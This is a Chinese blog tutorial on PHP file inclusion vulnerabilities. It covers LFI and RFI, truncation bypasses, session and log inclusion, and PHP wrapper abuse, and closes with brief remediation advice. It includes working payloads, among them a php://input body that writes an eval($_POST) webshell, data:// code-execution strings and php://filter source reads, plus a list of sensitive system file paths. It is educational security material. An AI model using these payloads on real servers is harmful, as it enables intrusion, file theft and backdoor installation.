文件包含漏洞

最新推荐文章于 2024-05-20 14:08:31 发布
最新推荐文章于 2024-05-20 14:08:31 发布
阅读量955 收藏 16
点赞数 16
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65144653/article/details/136014254
版权

文件包含漏洞

文件包含漏洞简介

文件包含漏洞基础介绍

文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。

文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。

文件包含漏洞常见函数

PHP当中有:include()、include_once()、require()、require_once()等;

include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行;
require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本;
include_once()和require_once():若文件中代码已被包含则不会再次包含。

分析漏洞产生的原因

案例一:

index.php中将page值传入main.php,在main.php存在以下代码:
    
<?php
    if($_GET['page']){
        include $_GET['page'];
    }else{
        include "home.php"
    }
?>
    
很正常的一段PHP代码,它是怎么运作的呢?
1.在index.php中取得page的值($_GET[page])。
2.判断$_GET[page]是不是空,若不空(这里是main.php)就用include来包含这个文件。
3.若$_GET[page]空的话就执行else,来 include "home.php"这个文件。

案例二:

<?php
	$filename = $_GET['page'];
	include($filename);
?>
    
	这是一段PHP代码,从代码上分析可以看出,把一个GET请求的参数“page”传给了一个变量filename,然后包含了这个变量。然而,开发者没有对$_GET['page']参数经过严格的过滤,直接带入了include的函数,我们可以修改$_GET['page']的值,包含自己想看的文件。(文件的路径一定要对,不对的话就包含不了)

这样,我们总结一下,文件包含漏洞就是:文件包含函数包含文件参数没有经过过滤或者严格的定义,并且参数可以被用户控制,就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么样的后缀类型,文件内的恶意代码都会被解析执行。

漏洞分类

注意:要实现远程文件包含需要allow_url_fopen和allow_url_include都开启

本地包含

可以包含本地文件,在条件允许时甚至能执行代码
读敏感文件,读PHP文件
包含日志文件GetShell
包含data:或php://input等伪协议
若有phpinfo则可以包含临时文件
配合上传图片马,然后包含从而GetShell

远程包含

包含远程的木马或病毒文件,从而GetShell

常见的敏感信息路径

Windows系统常见敏感文件
c:\boot.ini                     	 查看系统版本
c:\xxx\php.ini                  	 php 配置信息
c:\xxx\my.ini                   	 MySQL配置信息
c:\xxx\httpd.conf               	 Apache配置信息

Linux系统常见敏感文件
/etc/passwd                   		Linux系统账号信息
/etc/httpd/conf/httpd.conf			Apache配置信息
/etc/my.cnf                    		MySQL配置文件
/usr/etc/php.ini             	  	PHP配置信息

无限制本地文件包含漏洞

# 无限制

<?php
$filename=$_GET['filename'];
include($filename);
?>
  
   这是一段PHP代码,从代码上分析可以看出,把一个GET请求的参数'filename'传给了一个变量filename,然后包含了这个变量。然而,开发者没有对$_GET['filename']参数经过严格的过滤,直接带入了include的函数,我们可以修改$_GET['filename']的值,包含自己想看的文件。(文件的路径一定要对,不对的话就包含不了)

包含普通文件

现在我们模拟一个场景:在一个网站中,

存在着这么几个文件:index.php 、LFI.php 、phpinfo.php。其中,index.php存在着包含的功能,现在想用index.php包含LFI.php文件和phpinfo.php文件

image-20230731105933672

包含LFI.php文件:

image-20230731105947745

包含phpinfo.php文件:

image-20230731110334432

包含敏感文件

我们拿windows系统中的boot.ini文件为例进行包含。因为boot.ini在C盘的根目录下,我们要包含这个文件的话首先要进入到这个目录下才能包含它。

这里便遇到了相对路径和绝对路径的概念

绝对路径:是指目录下的绝对位置,直接到达目标位置,需要输入完整的文件路径。
相对路径:是指由这个文件所在的路径引起的跟其它文件(或文件夹)的路径关系。
相对路径需要用到“../”来访问上一级路径

image-20230731111243763

本地文件包含漏洞可以通过文件包含功能,将任意后缀文件中的代码执行。test.txt文件的内容是<?php phpinfo();?>,利用文件包含漏洞包含test.txt文件会将里面的PHP代码执行输出phpinfo信息

image-20230731111257491

有限制本地文件包含漏洞(过滤手段)

# 有限制

<?php
	$filename = $_GET['page'];
	include($filename . "html");
?>

在包含变量$filename时,限制了只允许包含“.html”格式的文件,这就阻止了一些非法的包含其他文件的情况。

当然,程序员也不想让自己编写的程序出现问题,所以会想尽一切办法对程序的BUG进行修补

%00截断文件包含

%00(%00截断)就是在url后面输入 %00 即可截断html。

条件:magic_quotes_gpc = off; php版本<5.3.4

image-20230731111535849

路径长度截断文件包含

长路径截断原理:
	操作系统存在最长目录的限制,可以通过输入超过最长目录的路径长度,这样系统就会将后面的路径丢弃,导致后缀截断。
	
windows下目录最大长度为256字节,超出的部分会被丢弃。
linux下目录最大长度为4096字节,超出的部分会被丢弃。
用…绕过的时候windows系统中,点号需要长于256,linux系统长于4096。

image-20230731111650994

点号截断文件包含

点号绕过的原理和长路径截断的一样:

windows下目录最大长度为256字节,超出的部分会被丢弃。用…绕过的时候windows系统中,点号需要长于256。

windows大于256	linux大于4096

image-20230731111708262

Session文件包含

当Session文件的内容可控,并且可以获取Session文件的路径,就可以通过包含Session文件进行攻击。

Session的存储位置一般是通过以下两种方式可以获取:

(1)通过phpinfo的信息可以获取到Session的存储位置。

image-20230731112208150

(2)通过猜测默认的Session存放位置进行尝试。

通常Linux下Session默认存储在/var/lib/php/session目录下。

image-20230731112232025

日志文件包含

​ 服务器中的中间件、SSH等服务都有记录日志的功能,如果开启了记录日志功能,用户访问的日志都会存储到不同服务的相关文件中,如果日志文件的位置是默认位置或者是可以通过其他方法获取到,就可以通过访问日志将恶意代码写入到日志文件中,然后通过文件包含漏洞,包含日志中的恶意代码,获得Web服务器的权限。比较典型的日志文件包含有中间件日志文件包含和SSH日志包含。

文件包含日志文件

image-20230731112316919

SSH日志包含

image-20230731112416008

远程文件包含

无限制远程文件包含

无限制:?filename=http://www.baidu.com/robots.txt

无限制远程文件包含是指包含的文件的位置并不是在本地服务器,而是可以通过URL的形式,包含其他服务器上的文件,执行其他服务器中文件的恶意代码。

漏洞利用条件:allow_url_fopen = on 和 allow_url_include = on。

image-20230731112454449

有限制远程文件

有限制:?filename=http://www.baidu.com/robots.txt%00

有限制远程文件包含漏洞是指代码中存在特定的前缀或者php、html等后缀,需要绕过前缀或者后缀,才能执行远程URL中的恶意代码。通常有限制远程文件包含绕过可通过问号、#号、空格三种方式来绕过。

image-20230731112544515

PHP伪协议

常见的PHP伪协议

PHP 带有很多内置 URL风格的封装协议,可用于类似 fopen()、copy()、file_exists()和 filesize()的文件系统函数。除了这些封装协议,还能通过 stream_wrapper_register()来注册自定义的封装协议

file://		 — 访问本地文件系统
http://		 — 访问 HTTP(s) 网址
ftp://		 — 访问 FTP(s) URLs
php://		 — 访问各个输入/输出流(I/O streams)
zlib://		 — 压缩流
data://		 — 数据(RFC 2397)
glob://		 — 查找匹配的文件路径模式
phar://		 — PHP 归档
expect://		 — 处理交互式的流

php://伪协议

条件:

  • allow_url_fopen:off/on
  • allow_url_include :仅php://input php://stdin php://memory php://temp 需要on

作用:
php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php://input	执行php代码
?filename=php://input
post参数提交:<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["abc"]);?>');?>

php://filter	读取文件源码
?filename=php://filter/read=convert.base64-encode/resource=flag.php

php://伪协议是PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://filter(本地磁盘文件进行读取)

最常使用的一个伪协议,一般可以利用它进行任意文件读取。

用法:?filename=php://filter/convert.base64-encode/resource=xxx.php

使用条件:只是读取,需要开启 allow_url_fopen,不需要开启 allow_url_include;

image-20230731134635877

php://filter 目标使用以下的参数作为它路径的一部分。

复合过滤链能够在一个路径上指定。详细使用这些参数可以参考具体范例。

image-20230731134648452

php://input(读取POST数据)

php://input 可以访问请求的原始数据的只读流(即可以直接读取到POST上没有经过解析的原始数据),

将post请求中的数据作为PHP代码执行。

注意:在“enctype="multipart/form-data" 的时候 php://input 是无效的。”

用法:?file=php://input 数据利用POST传过去

利用条件:不需要开启 allow_url_fopen,不需要开启allow_url_include。

image-20230731134820475

php://input(写入木马)
php://input	执行php代码
?filename=php://input
post参数提交:<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["abc"]);?>');?>

利用条件:需开启 allow_url_include,allow_url_fopen 不需要开启。

image-20230731134855857

php://input(命令执行)

利用条件:需开启 allow_url_include,allow_url_fopen 不需要开启。

image-20230731134939656

data://伪协议!!!

条件

  • allow_url_fopen :on
  • allow_url_include :on

作用
自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

?filename=data://text/plain,<?php%20phpinfo();?>
?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

​ PHP 版本5.2.0 起数据流封装器开始有效,主要用于数据流的读取,如果传入的数据是PHP代码,就会执行此代码,可造成任意代码执行。

image-20230731135000001

file://伪协议

条件:

  • allow_url_fopen:off/on
  • allow_url_include :off/on

作用:
用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。
include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。

?filename=file://C:/windows/win.ini

file协议可以访问本地文件系统,读取到文件的内容。

利用条件:不需要开启allow_url_fopen,不需要开启allow_url_include。

image-20230731135008052

phar://伪协议

这个参数是就是php解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压。

用法:?file=phar://压缩包/内部文件 phar://xxx.png(压缩包)/shell.php (内部文件)

注意: PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行,

将木马文件压缩后,改为其他任意格式的文件都可以正常使用。

步骤: 写一个一句话木马文件shell.php,然后用zip协议压缩为shell.zip,

然后将后缀改为png等其他格式。

image-20230731135036289

zip://伪协议

zip伪协议和phar协议类似,但是用法不一样。

用法:?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php

条件: PHP > =5.3.0,注意在windows下测试要5.3.0<PHP<5.4 才可以 #在浏览器中要编码为%23,否则浏览器默认不会传输特殊字符

image-20230731135125893

文件包含漏洞修复

一、代码层修复

通过代码层进行过滤,将包含的参数设置为白名单。

二、服务器安全配置

1.修改php的配置文件将open_basedir的值设置为可以包含的特定目录,后面要加/,例如:open_basedir=/var/www/html/。

2.修改PHP的配置文件关闭allow_url_include可以防止远程文件包含。

沫风港
关注
  • 16
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含及代码执行及命令执行
j1044957016的博客
06-01 2378
文件包含,代码执行,命令执行常见的函数,以及如何绕过过滤
第42天:WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
wuqingsix的博客
12-01 276
1、程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。2、文件包含函数参数没有经过过滤或者严格定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。3、
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 5万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞实战
yuan_boss的博客
08-31 1215
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 3945
文件包含漏洞就是使用函数包含任意文件的时候,当包含文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 2840
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含
文件包含漏洞利用
qq_56327824的博客
04-27 3007
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
安卓部署ffmpeg全平台so并实现命令行调用
codeofcc的博客
05-17 1056
前面的章节实现了ffmpeg全平台so的生成,接下来的步骤就是部署以及使用了,部署so还是比较简单的,用gradle和cmake都可以部署,部署好了就可以直接使用了,如果需要c++进行封装一层,则需要链接,对cmake熟悉的话链接也是比较简单的。以上就是今天讲述的内容,ffmpeg的so部署还是比较容易的,但是命令行的调用会麻烦一些,尤其是要解决ffmpeg退出问题,在c++中比较好解决,java理论上也比较好实现,如果在dart中则会比较麻烦,因为dart的方法通常不能跨线程调用,多线程的情况会出问题。
Android----USB通信
工宗浩生财指南针
05-13 350
Android开发中实现USB通信,通常涉及到与USB设备的交互,包括请求设备权限、与设备通信等步骤。
安卓手机APP开发__支持64位的架构
红孩儿编程大师
05-15 623
在谷歌的应用中发布的APP需要支持64位的架构。添加上你的APP的64位的版本, 提供了性能上的提升,并且能够运行在仅支持64位的硬件上。
阿里云服务器下,部署LNMP环境安装wordpress
dl_11的博客
05-14 476
在阿里云环境下部署LNMP服务时,尤其是安装MySQL了时需要注意,和centos7不完全一样。在利用LNMP环境部署wordpress时,一定要先测试LNMP环境没问题,再部署wordpress,不然找问题好麻烦。MySQL和PHP,版本不同,部署和配置的方法不同,所以如果是安装的其他版本的本文章中的方法不一定实用。
Android Audio基础——AudioFlinger回放录制线程(七)
最新发布
小旭的专栏
05-20 212
PlaybackThread 和 RecordThread 的基类。录制线程类,由 ThreadBase 派生。回放线程基类,同由 ThreadBase 派生。混音回放线程类,由 PlaybackThread 派生,负责处理标识为 AUDIO_OUTPUT_FLAG_PRIMARY、AUDIO_OUTPUT_FLAG_FAST、AUDIO_OUTPUT_FLAG_DEEP_BUFFER 的音频流,MixerThread 可以把多个音轨的数据混音后再输出。
android radiongroup应用举例
xie__jin__cheng的博客
05-18 166
android radiongroup应用举例
java 文件包含漏洞
01-05
Java 文件包含漏洞是指在 Java 程序开发中存在的一种安全漏洞。这种漏洞通常出现在程序中使用了不安全的文件包含函数的情况下。 在 Java 中,文件包含函数可以通过一些方式导入外部文件,比如使用相对路径或绝对...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值